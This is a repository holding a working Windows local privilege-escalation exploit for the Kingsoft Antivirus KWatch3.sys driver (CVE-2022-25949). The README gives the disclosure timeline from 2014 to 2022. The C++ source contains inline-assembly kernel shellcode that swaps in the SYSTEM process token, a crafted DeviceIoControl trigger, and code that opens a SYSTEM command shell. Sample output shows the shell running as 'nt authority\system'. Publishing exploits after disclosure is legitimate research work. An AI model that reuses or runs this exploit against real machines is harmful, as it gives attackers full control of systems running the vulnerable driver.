├── .gitignore
├── LICENSE
├── README.md
└── src
    ├── exploit_kwatch3.sln
    └── exploit_kwatch3
        ├── exploit_kwatch3.cpp
        ├── exploit_kwatch3.vcxproj
        └── exploit_kwatch3.vcxproj.filters

/.gitignore:
--------------------------------------------------------------------------------
# Prerequisites
*.d

# Compiled Object files
*.slo
*.lo
*.o
*.obj

# Precompiled Headers
*.gch
*.pch

# Compiled Dynamic libraries
*.so
*.dylib
*.dll

# Fortran module files
*.mod
*.smod

# Compiled Static libraries
*.lai
*.la
*.a
*.lib

# Executables
*.exe
*.out
*.app
--------------------------------------------------------------------------------

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2022 Satoshi Tanda

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# CVE-2022-25949

A years-old exploit of a local EoP vulnerability in Kingsoft Antivirus KWatch Driver version 2009.3.17.77.

## 2009..?

I reported the issue in January 2014 and was notified of the CVE 8+ years later. I decided to upload this because it is amusing enough to find my old code and that it took that long.

Thus, this must not be a new vulnerability despite the new CVE -- a quick search showed multiple reports for the same-looking vulnerability already.

## Timeline

- Jan 12, 2014: I submit the issue to IPA
- Jan 15, 2014: IPA acknowledges the submission
- Mar 10, 2022: IPA notifies me of publication (I ignored it. I thought it was spam)
- Mar 15, 2022: An [advisory](https://jvndb.jvn.jp/en/contents/2022/JVNDB-2022-000021.html) is published

I still thank IPA for doing their part and making my day.

## Notes

The vulnerable file appears to be [ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479](https://www.virustotal.com/gui/file/ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479/details)

```
//
// Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys)
// Target File Version: 2009.3.17.77
// Affected Product: Kingsoft Internet Security 9 Plus
//

/*
------------------------------------------------------------------------------
Shellcode is located at 7E7E7E7E.
The device was opened as 00000020.
Shellcode was executed.
The SYSTEM shell was launched.
This process will be suspended for ever.

------------------------------------------------------------------------------
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>whoami
nt authority\system
------------------------------------------------------------------------------
*/
```
--------------------------------------------------------------------------------

/src/exploit_kwatch3.sln:
--------------------------------------------------------------------------------
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Express 2013 for Windows Desktop
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "exploit_kwatch3", "exploit_kwatch3\exploit_kwatch3.vcxproj", "{AEA9AEE4-1EEE-4CF0-B300-EEC5046ACBFC}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Win32 = Debug|Win32
		Release|Win32 = Release|Win32
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{AEA9AEE4-1EEE-4CF0-B300-EEC5046ACBFC}.Debug|Win32.ActiveCfg = Debug|Win32
		{AEA9AEE4-1EEE-4CF0-B300-EEC5046ACBFC}.Debug|Win32.Build.0 = Debug|Win32
		{AEA9AEE4-1EEE-4CF0-B300-EEC5046ACBFC}.Release|Win32.ActiveCfg = Release|Win32
		{AEA9AEE4-1EEE-4CF0-B300-EEC5046ACBFC}.Release|Win32.Build.0 = Release|Win32
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------

/src/exploit_kwatch3/exploit_kwatch3.cpp:
--------------------------------------------------------------------------------
//
// Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys)
// Target File Version: 2009.3.17.77
// Affected Product: Kingsoft Internet Security 9 Plus
//

/*
------------------------------------------------------------------------------
Shellcode is located at 7E7E7E7E.
The device was opened as 00000020.
Shellcode was executed.
The SYSTEM shell was launched.
This process will be suspended for ever.

------------------------------------------------------------------------------
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>whoami
nt authority\system
------------------------------------------------------------------------------
*/
// The header names and template arguments in angle brackets were lost when
// this file was extracted; the ones below are restored as the minimum the
// code needs to compile (an assumption, not the original text).
#include <cstdio>
#include <cstring>
#include <memory>
#include <utility>
#include <vector>

#include <Windows.h>
#include <tchar.h>


namespace {


// Indicates if the privilege of this process has already been escalated.
volatile bool g_exploited = false;

static const int BYTES_OF_SHELLCODE = 100;


//
// Prototypes
//
bool SendExploitData();

DWORD WINAPI WaitAndLauncCMDThread(
    __in void* Context);

bool LaunchCMD();

void SuspendProcess();


//
// Implementations
//


// Wraps a raw pointer (or HANDLE) in a unique_ptr with a custom deleter.
template <typename T, typename D> inline
std::unique_ptr<T, D> make_unique_ptr(
    __in T* p,
    __in D d = D())
{
    return std::unique_ptr<T, D>(p, std::forward<D>(d));
}


// Defines for XP SP3
#define WINXP_KTHREAD_OFFSET    0x124
#define WINXP_EPROCESS_OFFSET   0x44
#define WINXP_FLINK_OFFSET      0x88
#define WINXP_PID_OFFSET        0x84
#define WINXP_TOKEN_OFFSET      0xc8
#define WINXP_SYS_PID           4

// Defines for 7 SP1
#define WIN_7_KTHREAD_OFFSET    0x124
#define WIN_7_EPROCESS_OFFSET   0x50
#define WIN_7_FLINK_OFFSET      0xb8
#define WIN_7_PID_OFFSET        0xb4
#define WIN_7_TOKEN_OFFSET      0xf8
#define WIN_7_SYS_PID           4

// Target settings
#define WIN_KTHREAD_OFFSET      WIN_7_KTHREAD_OFFSET    // nt!_KPCR.PcrbData.CurrentThread
#define WIN_EPROCESS_OFFSET     WIN_7_EPROCESS_OFFSET   // nt!_KTHREAD.ApcState.Process
#define WIN_FLINK_OFFSET        WIN_7_FLINK_OFFSET      // nt!_EPROCESS.ActiveProcessLinks.Flink
#define WIN_PID_OFFSET          WIN_7_PID_OFFSET        // nt!_EPROCESS.UniqueProcessId
#define WIN_TOKEN_OFFSET        WIN_7_TOKEN_OFFSET      // nt!_EPROCESS.Token
#define WIN_SYS_PID             WIN_7_SYS_PID           // PID of the SYSTEM process

// Shellcode that exchanges a token of a current process with
// a token of SYSTEM process in order to obtain SYSTEM privilege.
__declspec (naked) static
void ShellCode()
{__asm{
    //int 3
    pushad

    mov eax, fs:[WIN_KTHREAD_OFFSET]        // eax <= Current._KTHREAD
    mov eax, [eax + WIN_EPROCESS_OFFSET]    // eax <= Current._EPROCESS
    push eax

    mov ecx, WIN_SYS_PID

SearchSystemProcess:
    mov eax, [eax + WIN_FLINK_OFFSET]       // eax <= _EPROCESS.ActiveProcessLinks.Flink
    sub eax, WIN_FLINK_OFFSET               // eax <= _EPROCESS of the next process
    cmp [eax + WIN_PID_OFFSET], ecx         // if (UniqueProcessId != SYS_PID)
    jne SearchSystemProcess                 //     jmp SearchSystemProcess
    mov edi, [eax + WIN_TOKEN_OFFSET]       // edi <= Token of process with SYS_PID
    and edi, 0fffffff8h                     // Must be aligned by 8

    pop eax                                 // eax <= Current._EPROCESS
    mov [eax + WIN_TOKEN_OFFSET], edi       // Replace the token of the process to escalate
                                            // by the token of the process with SYS_PID

    popad
    //int 3
    mov g_exploited, 1

EndlessLoop:
    pause
    jmp EndlessLoop
    int 3
}}


// Send exploit data to the driver
bool SendExploitData()
{
    const auto deviceHandle = make_unique_ptr(::CreateFile(
        TEXT("\\\\.\\kwatch3"),
        GENERIC_READ,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        nullptr,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        nullptr), ::CloseHandle);
    if (deviceHandle.get() == INVALID_HANDLE_VALUE)
    {
        return false;
    }
    printf("The device was opened as %p.\n", deviceHandle.get());

    std::vector<char> exploit_kwatch3(0x44, 0x7e);
    DWORD returned = 0;
    const auto succeed = ::DeviceIoControl(
        deviceHandle.get(), 0x80030004,
        exploit_kwatch3.data(), exploit_kwatch3.size(),
        nullptr, 0,
        &returned, nullptr);

    return !!succeed;
}


// Waits until the shellcode has run, then launches a shell and suspends
// this process (the shellcode never returns to the driver).
DWORD WINAPI WaitAndLauncCMDThread(
    __in void* Context)
{
    UNREFERENCED_PARAMETER(Context);

    while (!g_exploited)
    {
        ::Sleep(100);
    }
    printf("Shellcode was executed.\n");

    if (!LaunchCMD())
    {
        return 1;
    }
    printf("The SYSTEM shell was launched.\n");
    printf("This process will be suspended for ever.\n");
    SuspendProcess();
    return 0;
}


bool LaunchCMD()
{
    TCHAR cmd[] = TEXT("C:\\Windows\\system32\\cmd.exe");
    PROCESS_INFORMATION pi;
    STARTUPINFO si = { sizeof(si) };
    if (!::CreateProcess(cmd, cmd, nullptr, nullptr, FALSE,
        CREATE_NEW_CONSOLE, nullptr, nullptr, &si, &pi))
    {
        return false;
    }

    ::CloseHandle(pi.hThread);
    ::CloseHandle(pi.hProcess);
    return true;
}


void SuspendProcess()
{
    typedef LONG (NTAPI*NtSuspendProcessType)(HANDLE ProcessHandle);
    auto ntSuspendProcess = reinterpret_cast<NtSuspendProcessType>(
        ::GetProcAddress(::GetModuleHandle(TEXT("ntdll")), "NtSuspendProcess"));

    ntSuspendProcess(::GetCurrentProcess());
}


} // end of {unnamed}


int _tmain()
{
    // Create a support thread
    auto thread = make_unique_ptr(::CreateThread(
        nullptr, 0,
        &WaitAndLauncCMDThread, nullptr,
        0, nullptr), ::CloseHandle);
    if (!thread)
    {
        return 1;
    }

    // Initialize shellcode
    auto shellcodeSpace = make_unique_ptr(::VirtualAlloc(
        reinterpret_cast<void*>(0x7e7e7e7e), 0x1000,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE),
        [](void* p){ ::VirtualFree(p, 0, MEM_RELEASE); });
    if (!shellcodeSpace)
    {
        return 1;
    }
    memset(shellcodeSpace.get(), 0xCC, 0x1000);
    auto shellcode = reinterpret_cast<void*>(0x7e7e7e7e);
    memcpy(shellcode, &ShellCode, BYTES_OF_SHELLCODE);
    printf("Shellcode is located at %p.\n", shellcode);

    // exploit
    if (!SendExploitData())
    {
        return 1;
    }
    return 0;
}
--------------------------------------------------------------------------------

/src/exploit_kwatch3/exploit_kwatch3.vcxproj:
--------------------------------------------------------------------------------
Debug
Win32

Release
Win32

{AEA9AEE4-1EEE-4CF0-B300-EEC5046ACBFC}
Win32Proj
exploit_kwatch3

Application
true
v120_xp
Unicode

Application
false
v120_xp
true
Unicode

true

false

Level4
Disabled
WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
true

Console
true

Level4

MaxSpeed
true
true
WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
true
MultiThreaded

Console
true
true
true
--------------------------------------------------------------------------------

/src/exploit_kwatch3/exploit_kwatch3.vcxproj.filters:
--------------------------------------------------------------------------------
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx

{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;hm;inl;inc;xsd

{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms

Source Files
--------------------------------------------------------------------------------